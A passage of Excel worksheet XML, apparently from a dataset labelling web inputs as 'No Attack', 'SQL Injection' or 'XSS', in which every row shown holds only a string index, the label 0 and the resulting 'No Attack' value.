        <f t="shared" si="607"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="38865" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A38865" s="1" t="s">
        <v>28267</v>
      </c>
      <c r="B38865">
        <v>0</v>
      </c>
      <c r="C38865" s="7" t="str">
        <f t="shared" si="607"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="38866" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A38866" s="1" t="s">
        <v>31090</v>
      </c>
      <c r="B38866">
        <v>0</v>
      </c>
      <c r="C38866" s="7" t="str">
        <f t="shared" si="607"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="38867" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A38867" s="1" t="s">
        <v>23770</v>
      </c>
      <c r="B38867">
        <v>0</v>
      </c>
      <c r="C38867" s="7" t="str">
        <f t="shared" si="607"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="38868" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A38868" s="1" t="s">
        <v>34132</v>
      </c>
      <c r="B38868">
        <v>0</v>
      </c>
      <c r="C38868" s="7" t="str">
        <f t="shared" si="607"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="38869" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A38869" s="1" t="s">
        <v>22853</v>
      </c>
      <c r="B38869">
        <v>0</v>
      </c>
      <c r="C38869" s="7" t="str">
        <f t="shared" si="607"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="38870" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A38870" s="1" t="s">
        <v>22060</v>
      </c>
      <c r="B38870">
        <v>0</v>
      </c>
      <c r="C38870" s="7" t="str">
        <f t="shared" si="607"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="38871" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A38871" s="1" t="s">
        <v>31541</v>
      </c>
      <c r="B38871">
        <v>0</v>
      </c>
      <c r="C38871" s="7" t="str">
        <f t="shared" si="607"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="38872" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A38872" s="1" t="s">
        <v>31791</v>
      </c>
      <c r="B38872">
        <v>0</v>
      </c>
      <c r="C38872" s="7" t="str">
        <f t="shared" si="607"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="38873" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A38873" s="1" t="s">
        <v>32278</v>
      </c>
      <c r="B38873">
        <v>0</v>
      </c>
      <c r="C38873" s="7" t="str">
        <f t="shared" si="607"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="38874" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A38874" s="1" t="s">
        <v>23039</v>
      </c>
      <c r="B38874">
        <v>0</v>
      </c>
      <c r="C38874" s="7" t="str">
        <f t="shared" si="607"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="38875" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A38875" s="1" t="s">
        <v>20932</v>
      </c>
      <c r="B38875">
        <v>0</v>
      </c>
      <c r="C38875" s="7" t="str">
        <f t="shared" si="607"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="38876" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A38876" s="1" t="s">
        <v>23302</v>
      </c>
      <c r="B38876">
        <v>0</v>
      </c>
      <c r="C38876" s="7" t="str">
        <f t="shared" si="607"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="38877" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A38877" s="1" t="s">
        <v>33378</v>
      </c>
      <c r="B38877">
        <v>0</v>
      </c>
      <c r="C38877" s="7" t="str">
        <f t="shared" si="607"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="38878" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A38878" s="1" t="s">
        <v>28986</v>
      </c>
      <c r="B38878">
        <v>0</v>
      </c>
      <c r="C38878" s="7" t="str">
        <f t="shared" si="607"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="38879" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A38879" s="1" t="s">
        <v>33137</v>
      </c>
      <c r="B38879">
        <v>0</v>
      </c>
      <c r="C38879" s="7" t="str">
        <f t="shared" si="607"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="38880" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A38880" s="1" t="s">
        <v>29634</v>
      </c>
      <c r="B38880">
        <v>0</v>
      </c>
      <c r="C38880" s="7" t="str">
        <f t="shared" si="607"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="38881" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A38881" s="1" t="s">
        <v>32826</v>
      </c>
      <c r="B38881">
        <v>0</v>
      </c>
      <c r="C38881" s="7" t="str">
        <f t="shared" si="607"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="38882" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A38882" s="1" t="s">
        <v>28202</v>
      </c>
      <c r="B38882">
        <v>0</v>
      </c>
      <c r="C38882" s="7" t="str">
        <f t="shared" si="607"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="38883" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A38883" s="1" t="s">
        <v>20425</v>
      </c>
      <c r="B38883">
        <v>0</v>
      </c>
      <c r="C38883" s="7" t="str">
        <f t="shared" si="607"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="38884" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A38884" s="1" t="s">
        <v>32494</v>
      </c>
      <c r="B38884">
        <v>0</v>
      </c>
      <c r="C38884" s="7" t="str">
        <f t="shared" si="607"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="38885" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A38885" s="1" t="s">
        <v>22501</v>
      </c>
      <c r="B38885">
        <v>0</v>
      </c>
      <c r="C38885" s="7" t="str">
        <f t="shared" si="607"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="38886" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A38886" s="1" t="s">
        <v>35942</v>
      </c>
      <c r="B38886">
        <v>0</v>
      </c>
      <c r="C38886" s="7" t="str">
        <f t="shared" si="607"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="38887" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A38887" s="1" t="s">
        <v>37450</v>
      </c>
      <c r="B38887">
        <v>0</v>
      </c>
      <c r="C38887" s="7" t="str">
        <f t="shared" si="607"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="38888" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A38888" s="1" t="s">
        <v>36430</v>
      </c>
      <c r="B38888">
        <v>0</v>
      </c>
      <c r="C38888" s="7" t="str">
        <f t="shared" si="607"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="38889" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A38889" s="1" t="s">
        <v>23077</v>
      </c>
      <c r="B38889">
        <v>0</v>
      </c>
      <c r="C38889" s="7" t="str">
        <f t="shared" si="607"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="38890" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A38890" s="1" t="s">
        <v>22313</v>
      </c>
      <c r="B38890">
        <v>0</v>
      </c>
      <c r="C38890" s="7" t="str">
        <f t="shared" si="607"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="38891" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A38891" s="1" t="s">
        <v>23037</v>
      </c>
      <c r="B38891">
        <v>0</v>
      </c>
      <c r="C38891" s="7" t="str">
        <f t="shared" si="607"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="38892" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A38892" s="1" t="s">
        <v>34257</v>
      </c>
      <c r="B38892">
        <v>0</v>
      </c>
      <c r="C38892" s="7" t="str">
        <f t="shared" si="607"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="38893" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A38893" s="1" t="s">
        <v>23768</v>
      </c>
      <c r="B38893">
        <v>0</v>
      </c>
      <c r="C38893" s="7" t="str">
        <f t="shared" si="607"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="38894" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A38894" s="1" t="s">
        <v>35866</v>
      </c>
      <c r="B38894">
        <v>0</v>
      </c>
      <c r="C38894" s="7" t="str">
        <f t="shared" si="607"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="38895" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A38895" s="1" t="s">
        <v>29829</v>
      </c>
      <c r="B38895">
        <v>0</v>
      </c>
      <c r="C38895" s="7" t="str">
        <f t="shared" si="607"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="38896" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A38896" s="1" t="s">
        <v>29118</v>
      </c>
      <c r="B38896">
        <v>0</v>
      </c>
      <c r="C38896" s="7" t="str">
        <f t="shared" si="607"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="38897" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A38897" s="1" t="s">
        <v>30765</v>
      </c>
      <c r="B38897">
        <v>0</v>
      </c>
      <c r="C38897" s="7" t="str">
        <f t="shared" si="607"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="38898" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A38898" s="1" t="s">
        <v>35425</v>
      </c>
      <c r="B38898">
        <v>0</v>
      </c>
      <c r="C38898" s="7" t="str">
        <f t="shared" si="607"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="38899" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A38899" s="1" t="s">
        <v>30262</v>
      </c>
      <c r="B38899">
        <v>0</v>
      </c>
      <c r="C38899" s="7" t="str">
        <f t="shared" si="607"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="38900" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A38900" s="1" t="s">
        <v>29955</v>
      </c>
      <c r="B38900">
        <v>0</v>
      </c>
      <c r="C38900" s="7" t="str">
        <f t="shared" si="607"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="38901" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A38901" s="1" t="s">
        <v>27188</v>
      </c>
      <c r="B38901">
        <v>0</v>
      </c>
      <c r="C38901" s="7" t="str">
        <f t="shared" si="607"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="38902" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A38902" s="1" t="s">
        <v>23042</v>
      </c>
      <c r="B38902">
        <v>0</v>
      </c>
      <c r="C38902" s="7" t="str">
        <f t="shared" si="607"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="38903" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A38903" s="1" t="s">
        <v>23232</v>
      </c>
      <c r="B38903">
        <v>0</v>
      </c>
      <c r="C38903" s="7" t="str">
        <f t="shared" si="607"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="38904" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A38904" s="1" t="s">
        <v>24163</v>
      </c>
      <c r="B38904">
        <v>0</v>
      </c>
      <c r="C38904" s="7" t="str">
        <f t="shared" si="607"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="38905" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A38905" s="1" t="s">
        <v>32396</v>
      </c>
      <c r="B38905">
        <v>0</v>
      </c>
      <c r="C38905" s="7" t="str">
        <f t="shared" si="607"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="38906" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A38906" s="1" t="s">
        <v>33189</v>
      </c>
      <c r="B38906">
        <v>0</v>
      </c>
      <c r="C38906" s="7" t="str">
        <f t="shared" si="607"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="38907" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A38907" s="1" t="s">
        <v>31544</v>
      </c>
      <c r="B38907">
        <v>0</v>
      </c>
      <c r="C38907" s="7" t="str">
        <f t="shared" si="607"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="38908" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A38908" s="1" t="s">
        <v>35313</v>
      </c>
      <c r="B38908">
        <v>0</v>
      </c>
      <c r="C38908" s="7" t="str">
        <f t="shared" si="607"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="38909" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A38909" s="1" t="s">
        <v>34223</v>
      </c>
      <c r="B38909">
        <v>0</v>
      </c>
      <c r="C38909" s="7" t="str">
        <f t="shared" si="607"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="38910" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A38910" s="1" t="s">
        <v>32522</v>
      </c>
      <c r="B38910">
        <v>0</v>
      </c>
      <c r="C38910" s="7" t="str">
        <f t="shared" si="607"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="38911" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A38911" s="1" t="s">
        <v>28620</v>
      </c>
      <c r="B38911">
        <v>0</v>
      </c>
      <c r="C38911" s="7" t="str">
        <f t="shared" si="607"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="38912" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A38912" s="1" t="s">
        <v>34335</v>
      </c>
      <c r="B38912">
        <v>0</v>
      </c>
      <c r="C38912" s="7" t="str">
        <f t="shared" si="607"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="38913" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A38913" s="1" t="s">
        <v>30160</v>
      </c>
      <c r="B38913">
        <v>0</v>
      </c>
      <c r="C38913" s="7" t="str">
        <f t="shared" si="607"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="38914" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A38914" s="1" t="s">
        <v>35981</v>
      </c>
      <c r="B38914">
        <v>0</v>
      </c>
      <c r="C38914" s="7" t="str">
        <f t="shared" si="607"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="38915" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A38915" s="1" t="s">
        <v>30499</v>
      </c>
      <c r="B38915">
        <v>0</v>
      </c>
      <c r="C38915" s="7" t="str">
        <f t="shared" ref="C38915:C38978" si="608">IF(B38915=0,"No Attack", IF(B38915=1, "SQL Injection", "XSS") )</f>
        <v>No Attack</v>
      </c>
    </row>
    <row r="38916" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A38916" s="1" t="s">
        <v>20381</v>
      </c>
      <c r="B38916">
        <v>0</v>
      </c>
      <c r="C38916" s="7" t="str">
        <f t="shared" si="608"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="38917" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A38917" s="1" t="s">
        <v>21175</v>
      </c>
      <c r="B38917">
        <v>0</v>
      </c>
      <c r="C38917" s="7" t="str">
        <f t="shared" si="608"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="38918" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A38918" s="1" t="s">
        <v>34760</v>
      </c>
      <c r="B38918">
        <v>0</v>
      </c>
      <c r="C38918" s="7" t="str">
        <f t="shared" si="608"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="38919" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A38919" s="1" t="s">
        <v>27002</v>
      </c>
      <c r="B38919">
        <v>0</v>
      </c>
      <c r="C38919" s="7" t="str">
        <f t="shared" si="608"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="38920" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A38920" s="1" t="s">
        <v>33227</v>
      </c>
      <c r="B38920">
        <v>0</v>
      </c>
      <c r="C38920" s="7" t="str">
        <f t="shared" si="608"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="38921" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A38921" s="1" t="s">
        <v>31009</v>
      </c>
      <c r="B38921">
        <v>0</v>
      </c>
      <c r="C38921" s="7" t="str">
        <f t="shared" si="608"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="38922" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A38922" s="1" t="s">
        <v>23858</v>
      </c>
      <c r="B38922">
        <v>0</v>
      </c>
      <c r="C38922" s="7" t="str">
        <f t="shared" si="608"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="38923" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A38923" s="1" t="s">
        <v>36742</v>
      </c>
      <c r="B38923">
        <v>0</v>
      </c>
      <c r="C38923" s="7" t="str">
        <f t="shared" si="608"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="38924" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A38924" s="1" t="s">
        <v>31789</v>
      </c>
      <c r="B38924">
        <v>0</v>
      </c>
      <c r="C38924" s="7" t="str">
        <f t="shared" si="608"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="38925" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A38925" s="1" t="s">
        <v>34488</v>
      </c>
      <c r="B38925">
        <v>0</v>
      </c>
      <c r="C38925" s="7" t="str">
        <f t="shared" si="608"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="38926" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A38926" s="1" t="s">
        <v>35291</v>
      </c>
      <c r="B38926">
        <v>0</v>
      </c>
      <c r="C38926" s="7" t="str">
        <f t="shared" si="608"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="38927" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A38927" s="1" t="s">
        <v>21473</v>
      </c>
      <c r="B38927">
        <v>0</v>
      </c>
      <c r="C38927" s="7" t="str">
        <f t="shared" si="608"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="38928" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A38928" s="1" t="s">
        <v>23846</v>
      </c>
      <c r="B38928">
        <v>0</v>
      </c>
      <c r="C38928" s="7" t="str">
        <f t="shared" si="608"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="38929" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A38929" s="1" t="s">
        <v>26992</v>
      </c>
      <c r="B38929">
        <v>0</v>
      </c>
      <c r="C38929" s="7" t="str">
        <f t="shared" si="608"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="38930" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A38930" s="1" t="s">
        <v>33980</v>
      </c>
      <c r="B38930">
        <v>0</v>
      </c>
      <c r="C38930" s="7" t="str">
        <f t="shared" si="608"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="38931" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A38931" s="1" t="s">
        <v>35954</v>
      </c>
      <c r="B38931">
        <v>0</v>
      </c>
      <c r="C38931" s="7" t="str">
        <f t="shared" si="608"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="38932" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A38932" s="1" t="s">
        <v>33467</v>
      </c>
      <c r="B38932">
        <v>0</v>
      </c>
      <c r="C38932" s="7" t="str">
        <f t="shared" si="608"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="38933" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A38933" s="1" t="s">
        <v>28089</v>
      </c>
      <c r="B38933">
        <v>0</v>
      </c>
      <c r="C38933" s="7" t="str">
        <f t="shared" si="608"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="38934" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A38934" s="1" t="s">
        <v>32307</v>
      </c>
      <c r="B38934">
        <v>0</v>
      </c>
      <c r="C38934" s="7" t="str">
        <f t="shared" si="608"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="38935" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A38935" s="1" t="s">
        <v>30231</v>
      </c>
      <c r="B38935">
        <v>0</v>
      </c>
      <c r="C38935" s="7" t="str">
        <f t="shared" si="608"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="38936" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A38936" s="1" t="s">
        <v>30703</v>
      </c>
      <c r="B38936">
        <v>0</v>
      </c>
      <c r="C38936" s="7" t="str">
        <f t="shared" si="608"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="38937" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A38937" s="1" t="s">
        <v>20084</v>
      </c>
      <c r="B38937">
        <v>0</v>
      </c>
      <c r="C38937" s="7" t="str">
        <f t="shared" si="608"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="38938" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A38938" s="1" t="s">
        <v>33665</v>
      </c>
      <c r="B38938">
        <v>0</v>
      </c>
      <c r="C38938" s="7" t="str">
        <f t="shared" si="608"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="38939" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A38939" s="1" t="s">
        <v>27109</v>
      </c>
      <c r="B38939">
        <v>0</v>
      </c>
      <c r="C38939" s="7" t="str">
        <f t="shared" si="608"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="38940" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A38940" s="1" t="s">
        <v>28090</v>
      </c>
      <c r="B38940">
        <v>0</v>
      </c>
      <c r="C38940" s="7" t="str">
        <f t="shared" si="608"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="38941" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A38941" s="1" t="s">
        <v>28316</v>
      </c>
      <c r="B38941">
        <v>0</v>
      </c>
      <c r="C38941" s="7" t="str">
        <f t="shared" si="608"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="38942" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A38942" s="1" t="s">
        <v>31234</v>
      </c>
      <c r="B38942">
        <v>0</v>
      </c>
      <c r="C38942" s="7" t="str">
        <f t="shared" si="608"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="38943" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A38943" s="1" t="s">
        <v>27297</v>
      </c>
      <c r="B38943">
        <v>0</v>
      </c>
      <c r="C38943" s="7" t="str">
        <f t="shared" si="608"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="38944" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A38944" s="1" t="s">
        <v>20530</v>
      </c>
      <c r="B38944">
        <v>0</v>
      </c>
      <c r="C38944" s="7" t="str">
        <f t="shared" si="608"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="38945" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A38945" s="1" t="s">
        <v>34111</v>
      </c>
      <c r="B38945">
        <v>0</v>
      </c>
      <c r="C38945" s="7" t="str">
        <f t="shared" si="608"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="38946" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A38946" s="1" t="s">
        <v>20299</v>
      </c>
      <c r="B38946">
        <v>0</v>
      </c>
      <c r="C38946" s="7" t="str">
        <f t="shared" si="608"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="38947" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A38947" s="1" t="s">
        <v>20905</v>
      </c>
      <c r="B38947">
        <v>0</v>
      </c>
      <c r="C38947" s="7" t="str">
        <f t="shared" si="608"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="38948" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A38948" s="1" t="s">
        <v>31179</v>
      </c>
      <c r="B38948">
        <v>0</v>
      </c>
      <c r="C38948" s="7" t="str">
        <f t="shared" si="608"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="38949" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A38949" s="1" t="s">
        <v>37342</v>
      </c>
      <c r="B38949">
        <v>0</v>
      </c>
      <c r="C38949" s="7" t="str">
        <f t="shared" si="608"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="38950" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A38950" s="1" t="s">
        <v>32306</v>
      </c>
      <c r="B38950">
        <v>0</v>
      </c>
      <c r="C38950" s="7" t="str">
        <f t="shared" si="608"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="38951" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A38951" s="1" t="s">
        <v>28203</v>
      </c>
      <c r="B38951">
        <v>0</v>
      </c>
      <c r="C38951" s="7" t="str">
        <f t="shared" si="608"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="38952" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A38952" s="1" t="s">
        <v>37318</v>
      </c>
      <c r="B38952">
        <v>0</v>
      </c>
      <c r="C38952" s="7" t="str">
        <f t="shared" si="608"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="38953" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A38953" s="1" t="s">
        <v>21021</v>
      </c>
      <c r="B38953">
        <v>0</v>
      </c>
      <c r="C38953" s="7" t="str">
        <f t="shared" si="608"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="38954" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A38954" s="1" t="s">
        <v>27896</v>
      </c>
      <c r="B38954">
        <v>0</v>
      </c>
      <c r="C38954" s="7" t="str">
        <f t="shared" si="608"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="38955" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A38955" s="1" t="s">
        <v>34653</v>
      </c>
      <c r="B38955">
        <v>0</v>
      </c>
      <c r="C38955" s="7" t="str">
        <f t="shared" si="608"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="38956" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A38956" s="1" t="s">
        <v>32382</v>
      </c>
      <c r="B38956">
        <v>0</v>
      </c>
      <c r="C38956" s="7" t="str">
        <f t="shared" si="608"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="38957" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A38957" s="1" t="s">
        <v>28532</v>
      </c>
      <c r="B38957">
        <v>0</v>
      </c>
      <c r="C38957" s="7" t="str">
        <f t="shared" si="608"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="38958" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A38958" s="1" t="s">
        <v>26934</v>
      </c>
      <c r="B38958">
        <v>0</v>
      </c>
      <c r="C38958" s="7" t="str">
        <f t="shared" si="608"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="38959" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A38959" s="1" t="s">
        <v>31120</v>
      </c>
      <c r="B38959">
        <v>0</v>
      </c>
      <c r="C38959" s="7" t="str">
        <f t="shared" si="608"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="38960" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A38960" s="1" t="s">
        <v>27470</v>
      </c>
      <c r="B38960">
        <v>0</v>
      </c>
      <c r="C38960" s="7" t="str">
        <f t="shared" si="608"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="38961" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A38961" s="1" t="s">
        <v>36922</v>
      </c>
      <c r="B38961">
        <v>0</v>
      </c>
      <c r="C38961" s="7" t="str">
        <f t="shared" si="608"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="38962" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A38962" s="1" t="s">
        <v>20484</v>
      </c>
      <c r="B38962">
        <v>0</v>
      </c>
      <c r="C38962" s="7" t="str">
        <f t="shared" si="608"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="38963" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A38963" s="1" t="s">
        <v>33296</v>
      </c>
      <c r="B38963">
        <v>0</v>
      </c>
      <c r="C38963" s="7" t="str">
        <f t="shared" si="608"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="38964" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A38964" s="1" t="s">
        <v>23688</v>
      </c>
      <c r="B38964">
        <v>0</v>
      </c>
      <c r="C38964" s="7" t="str">
        <f t="shared" si="608"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="38965" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A38965" s="1" t="s">
        <v>20964</v>
      </c>
      <c r="B38965">
        <v>0</v>
      </c>
      <c r="C38965" s="7" t="str">
        <f t="shared" si="608"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="38966" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A38966" s="1" t="s">
        <v>30299</v>
      </c>
      <c r="B38966">
        <v>0</v>
      </c>
      <c r="C38966" s="7" t="str">
        <f t="shared" si="608"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="38967" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A38967" s="1" t="s">
        <v>20550</v>
      </c>
      <c r="B38967">
        <v>0</v>
      </c>
      <c r="C38967" s="7" t="str">
        <f t="shared" si="608"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="38968" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A38968" s="1" t="s">
        <v>21615</v>
      </c>
      <c r="B38968">
        <v>0</v>
      </c>
      <c r="C38968" s="7" t="str">
        <f t="shared" si="608"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="38969" spans="1:3" x14ac:dyDescent="0.3">
